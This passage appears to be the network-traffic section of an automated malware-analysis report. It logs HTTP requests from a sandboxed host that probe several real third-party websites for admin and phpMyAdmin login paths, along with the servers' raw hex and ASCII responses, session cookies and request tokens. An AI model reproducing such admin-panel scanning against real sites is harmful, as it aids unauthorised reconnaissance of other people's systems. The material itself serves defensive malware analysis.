69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.502281904 CET173INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                95192.168.2.65387285.255.14.1880
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.011776924 CET226OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.216573000 CET514INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Location: /Home/Login?ReturnUrl=%2fadministrator%2f
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 158
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 2f 48 6f 6d 65 2f 4c 6f 67 69 6e 3f 52 65 74 75 72 6e 55 72 6c 3d 25 32 66 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 25 32 66 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="/Home/Login?ReturnUrl=%2fadministrator%2f">here</a>.</h2></body></html>
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.287286043 CET252OUTGET /Home/Login?ReturnUrl=%2fadministrator%2f HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.505121946 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=setawluaocoer3ouv5bzrxfg; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                Set-Cookie: ASP.NET_SessionId=setawluaocoer3ouv5bzrxfg; path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                                                                                                                                Set-Cookie: __RequestVerificationToken=9Tw4eBQMtJgww6r2d6xlIUkI77SdB-d_QbVeWe2xleWw9E4exyU-bCgcjVhGShYDr4w6sPQ_lWAp-mq26ZSEINgjwx9o2Wpwu8Yy7vq2iaI1; path=/; HttpOnly
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6853
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTI
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.505135059 CET1340INData Raw: e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d
                                                                                                                                                                                                                                                                                                                Data Ascii: OO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.505146980 CET1340INData Raw: 0c cd 97 c1 b7 33 22 e7 47 47 7b 3b 7b f7 c6 e9 2c 9f e6 8b 49 5e a7 7b e3 b4 f9 41 b5 98 64 ad 99 77 7a 2b 7c ef 8a e6 61 0e 98 83 2d e0 d7 34 1f 1d 91 d7 b2 ca 96 47 5f 64 8f d2 c7 f9 e2 e8 8b 9c 74 d0 2c 7b 7c 97 7e 1f f1 27 3f 59 10 1f 2e f9
                                                                                                                                                                                                                                                                                                                Data Ascii: 3"GG{;{,I^{Adwz+|a-4G_dt,{|~'?Y."0yUV&c/,}$&7T89UV6MSL<J64DB~l/iJ`G&o,V~7U_4c!F<{\,WV_$>RP nF~*
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.505198956 CET1340INData Raw: 2d 44 6c bf cd 7f 50 bc ad 96 d7 e4 97 45 7c 20 b8 21 f4 73 55 a4 c7 fa 42 8a 49 a5 8f e8 2d fa 85 66 97 5e 8d 60 7b 7b 74 58 42 89 61 34 a8 89 61 21 4d f4 8f 22 45 bb 48 97 f4 ab 18 10 fc 66 3e 24 3c 2c d1 54 23 ab 32 76 88 fd 10 0d c8 b7 0b 5e
                                                                                                                                                                                                                                                                                                                Data Ascii: -DlPE| !sUBI-f^`{{tXBa4a!M"EHf>$<,T#2v^3zOX^">sYFT)?(J-B;0 r#." GDrW8`XEd}F1(B)|A=*YvM4$ boNHON5eF@~'s&
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.708075047 CET1340INData Raw: 95 e0 c7 bf eb f6 76 7a 77 4c 8b b4 58 ab 35 ab ba e9 f6 36 b7 0a da d0 0a b3 bf 7c 2f 6d 1e df a5 57 e9 a7 fc 47 5d 51 17 78 87 7f 77 bf ba df e8 ff e6 0f fc 4a bf 19 26 2e b3 eb 6a dd 6e 2f a8 0f 61 61 ff 4b db b9 7c 15 7c 57 57 57 fa 29 41 27
                                                                                                                                                                                                                                                                                                                Data Ascii: vzwLX56|/mWG]QxwJ&.jn/aaK||WWW)A'U^C_Q0*fQzoggo<K^}.v^6X-o/U-Tos^|{|}w?q[gO/.N/t
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.708086014 CET1143INData Raw: c2 69 b5 ba 3e 04 cb 1d 10 3b ee dd 1b 0b 51 6c f6 dc 64 85 d2 6f 57 4b 0a 7d 7e 3a 4b bf 28 48 cb 2e d3 9f ae 2e d2 f3 7c 49 f8 d4 94 b4 f8 5d 05 9c 19 18 fd 1a ed 96 48 4c 6e 58 5d 5c cc c9 ef 91 66 1e 17 17 8b 55 9d 37 cd 0f d6 e4 4f 9c d9 df
                                                                                                                                                                                                                                                                                                                Data Ascii: i>;QldoWK}~:K(H..|I]HLnX]\fU7O}mvg(Rt[~|Q<^+Z8_]d&dEkUO},W~ER\[y<Op9)e%!8o$N];os-
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.777138948 CET491OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: bokod.hu
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                Cookie: __RequestVerificationToken=9Tw4eBQMtJgww6r2d6xlIUkI77SdB-d_QbVeWe2xleWw9E4exyU-bCgcjVhGShYDr4w6sPQ_lWAp-mq26ZSEINgjwx9o2Wpwu8Yy7vq2iaI1; ASP.NET_SessionId=setawluaocoer3ouv5bzrxfg
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Referer: http://bokod.hu/Home/Login?ReturnUrl=%2fadministrator%2f
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.991646051 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                X-AspNetMvc-Version: 5.2
                                                                                                                                                                                                                                                                                                                X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Content-Length: 6425
                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 f1 ef fa f4 cb 93 37 bf cf cb d3 74 de 2e ca 23 fa 00 3f d3 32 5b 5e 7c f6 51 be fc 88 3f c9 b3 19 fd fc b1 c7 8b bc cd d2 e9 3c ab 9b bc fd ec a3 75 7b be 7d f0 51 7a d7 7d b5 cc 16 f9 67 1f 5d 16 f9 d5 aa aa db 8f d2 69 b5 6c f3 25 35 bd 2a 66 ed fc b3 59 7e 59 4c f3 6d fe 23 78 cf b6 6b f3 77 ed 5d 20 70 68 bb d1 5e e6 6d bb da ce 7f d1 ba b8 fc ec a3 13 69 be fd e6 7a 95 0b 1c 40 6a 8b b6 cc 8f 1e df 95 9f f8 84 61 af ea 6a 95 d7 ed f5 67 1f 9d 4f 1e 65 ab d5 ef 5f cc 3c c4 3e dd ff f4 e1 c3 fb fb 3b 07 07 7b f7 f6 ef ed 0a 34 7d 53 46 73 91 2f f3 3a 6b ab da 7b eb 65 5d 9d 7c f1 3a fd c9 bd f1 8e bc e1 bf 50 e7 ab f2 7a bb ad bc f6 f3 e2 32 6b b3 f2 f7 9c 54 6f ab d9 78 be ee bf 34 ad d6 cb b6 be f6 de f9 f6 7a 79 91 e1 93 6e d3 59 de 4c eb 62 d5 16 d5 d2 6b fe 04 a0 d3 df eb 1f fd 3b 7e d0 fc a3 7f f5 45 fa ed 6a 59 66 ab 9f ce e4 75 1a 12 ff 8f fe 79 5c 16 cb b7 69 9d 97 9f 7d 54 d0 cb 44 d8 3a 3f ff ec a3 bb e7 19 cd 4d b5 1c d3 3f 1f a5 2d 11 f6 b3 8f 8b 45 76 91 df 7d b7 4d 1f 2d 3f 66 38 fe db 44 ca 32 a7 61 ae a7 73 6e f1 51 da 14 3f c8 9b cf 3e ba ff e0 dd fd 07 16 ae 34 43 83 6d fe 62 bc 5a 5e 80 a9 6e 05 ea d3 9d 77 9f 12 85 fb a0 f8 8b f7 02 f5 60 ef dd 83 bd 18 28 fe e2 fd 40 7d fa ee c1 a7 51 50 f8 e2 bd 40 ed ee ee bf a3 ff c7 80 d1 c7 f8 ea fd c0 ed ed bc a3 ff 47 c1 c9 57 ef 07 6e 9f 50 d8 8f 63 27 5f bd 1f b8 fb 7b ef e8 ff 51 70 f2 d5 fb 81 3b a0 11 1d c4 07 2b 5f c5 c0 e1 7b 65 f0 8f 84 c1 d1 c8 c2 7c 48 78 3c f4 50 5c ce ea aa 98 29 54 f9 f2 fd a1 de db 7b 77 cf c1 54 49 db e6 4f df 1f d8 c3 4f df 3d 74 dc 67 80 f1 a7 ef 0f 6c f7 d3 77 bb 7d 60 fc 69 0c d8 22 5b 16 e7 79 43 9a 5d df 30 1f 8c 7f ba a1 6e b8 b5 a7 a9 16 0d e6 a4 98 66 d0 55 db 6f 8a 32 3f a9 ca 40 91 fe f8 39 3f b7 78 f3 0c b8 7b 6f de 5d 34 3a 2b 5d 4e f4 c0 b4 f3 7c 91 6f 4f 87 3b 45 7b d1 a6 69 53 4f 09 ea 6b fe a3 b9 bb a8 66 79 bd 2c 7e 50 ff 1e 97 9f 15 cb 93 9f 5c 9f 3e cb 3f fd ce fe 4f ec 3c 38 de 39 9e be 6a 26 df 29 a6 bf ff 57 a7 f7 bf b8 5a bd fa e2 c5 e7 d3 2f db b7 0f f7 df 9c ee 7e 44 06 48 00 2a 74 26 9e 52 4b ed d6 5d 46 ab b9 3b c9 9a fc ee b4 69 a8 8b df e7 fc f3 9d 7a 72 f2 13 eb 5f f4 ec 5e fd a4 99 bc 5d 4e 3e bd fc bd 0e 3e fd c1 f6 bb d9 2f 9a bf fa c1 ea dd f5 cb ea 41 f5 53 a7 b3 8a 6c 14 cf 45 d3 5e 97 79 33 cf f3 f6 23 a8 e6 6e 5f 62 a2 6c 97 93 aa 6a 9b b6 ce 56 f7 b4 c7 f2 a7 7e 9f af 5e e5 5f 7e fb 74 7a fa c5 57 bf cf ac fe 45 3f b1 7a f1 c5 2f fa ce f5 77 7f b0 bf 5d bd db b9 5c 7e f9 f6 a7 ef 3d d9 3f 79 b0 dc f9 7a 3d 9e d3 cf ec 2a 6f aa 45 7e 5f fb 7c 71 f9 8b 5e bd 5c 1c 7c ba df 7c f5 fb df fb f4 f3 ea f7 f9 bd bf 98 3f fb bd cf 4e 7e 9f 67 bf d7 fd 27 fb 3b bf d7
                                                                                                                                                                                                                                                                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7t.#?2[^|Q?<u{}Qz}g]il%5*fY~YLm#xkw] ph^miz@jajgOe_<>;{4}SFs/:k{e]|:Pz2kTox4zynYLbk;~EjYfuy\i}TD:?M?-Ev}M-?f8D2asnQ?>4CmbZ^nw`(@}QP@GWnPc'_{Qp;+_{e|Hx<P\)T{wTIOO=tglw}`i"[yC]0nfUo2?@9?x{o]4:+]N|oO;E{iSOkfy,~P\>?O<89j&)WZ/~DH*t&RK]F;izr_^]N>>/ASlE^y3#n_bljV~^_~tzWE?z/w]\~=?yz=*oE~_|q^\||?N~g';
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.991656065 CET1340INData Raw: ce 57 ed a7 a7 c7 2f 5e 9e dd bb f8 7a 7d 4e ca 75 5e 2c 56 db 17 59 59 e6 f5 b5 76 fb dd f6 f3 ec bb a7 c7 cf bf 7a bb ff dd e6 cb b3 f5 6c f9 e5 f9 83 f5 d3 df e7 27 7e 70 f0 f2 c5 ef 73 fd 7b 3d b9 b7 77 fa 7b 1d 3f f9 c9 e7 4f bf 66 b7 e7 c4
                                                                                                                                                                                                                                                                                                                Data Ascii: W/^z}Nu^,VYYvzl'~ps{=w{?OfUYe3O_{==~A*?}N~/_'g'Ez|Z{':;{}3Eg^o-?o^tqsz|3O:'O
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.991662979 CET1340INData Raw: af 0b 12 1d 17 d8 55 cb b7 44 bf 6c 79 fd 83 ac bd bb 5e 16 55 b3 4d e6 f5 a7 f3 b7 6d fe 36 18 42 0c d2 76 9b d7 97 b7 02 b5 4d 9d ee e2 9f 07 01 50 7f 20 de ef fe af f4 9b e9 57 29 be cc 2e cd f8 fc 6f 23 b3 45 2d cd b7 f4 eb 24 e3 af d2 34 fa
                                                                                                                                                                                                                                                                                                                Data Ascii: UDly^UMm6BvMP W).o#E-$4y72y<Y-Vd):*ic2cr()O]@Lm{Rd<+Ef146Gg5'h!)?krffV"NH$FG
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.991677046 CET1340INData Raw: af 34 4c 65 95 98 2c 01 c5 6f 64 00 60 c0 4b 0a bf 28 cd 0d 69 a3 3f a4 53 fe e4 67 b3 e3 e6 07 d9 84 d6 19 88 0c c4 26 f4 cd 25 e4 f1 35 7d 48 fd 13 81 f4 9b 11 2b eb 0f 94 45 4a 78 95 97 19 a5 8b 6a 62 3c 88 c1 0b 7c 20 fd f0 a7 f2 2b 7d f5 41
                                                                                                                                                                                                                                                                                                                Data Ascii: 4Le,od`K(i?Sg&%5}H+EJxjb<| +}Ah8cM,'NYv]I-e5NZdrR2[=yS"D%DfwWI/K)g;]5si9JlI]TV
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.991686106 CET1340INData Raw: d1 f1 a0 ab 2e e1 df 2c 47 74 79 83 a8 47 6a fb 1f fd ab 7f f0 8f fe d5 44 3a fa 44 bf 7b 3f d6 d0 90 e1 1f fd fb 4a 02 43 31 3c 2d 0d d0 2f 5f 03 9f e7 f9 c5 f2 1f fd ab 57 b0 63 ff f8 df 3c 99 a4 d3 e2 ed 5b 0c 8c be 92 46 37 61 06 bc f8 17 4f
                                                                                                                                                                                                                                                                                                                Data Ascii: .,GtyGjD:D{?JC1<-/_Wc<[F7aO/Y!;~J-K~BFyZ4IE6Iu7OO^_0m@;q4ww%uhn|'r{_M2+o(B{+{mjbl
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.991693020 CET343INData Raw: 74 f7 dd 9f ce 68 7d 8a 3f 15 25 f3 bb 6d cd aa 29 67 17 ef 8c eb 3c 9b 5d 6f 9d af 97 53 08 74 ba 75 27 fd c5 68 42 6d 3e 1a 33 5a 1f dd 91 9f 5b f2 f9 8f 65 6b 52 a5 24 92 8f 52 a4 c0 46 e1 87 af 57 79 3e 7b 94 7e ba b3 b3 63 be 99 65 a4 2a 2e
                                                                                                                                                                                                                                                                                                                Data Ascii: th}?%m)g<]oStu'hBm>3Z[ekR$RFWy>{~ce*.o=y)K:sNt%wt-/4V1)5Xc(<[y.z[gFQfd_}8OcfQ]'qQUF}SF^%oNi@FF|D_"(S-


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                96192.168.2.654450195.68.234.25280
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.047034025 CET227OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: pfprojekt.sk
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.260078907 CET497INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                Date: Sat, 02 Dec 2023 01:09:28 GMT
                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                Location: http://www.pfprojekt.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                Content-Length: 243
                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 66 70 72 6f 6a 65 6b 74 2e 73 6b 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.pfprojekt.sk/phpmyadmin/">here</a>.</p></body></html>


                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                97192.168.2.65530664.71.33.3180
                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:09:28.239916086 CET225OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                Host: mcsmk8.com
                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
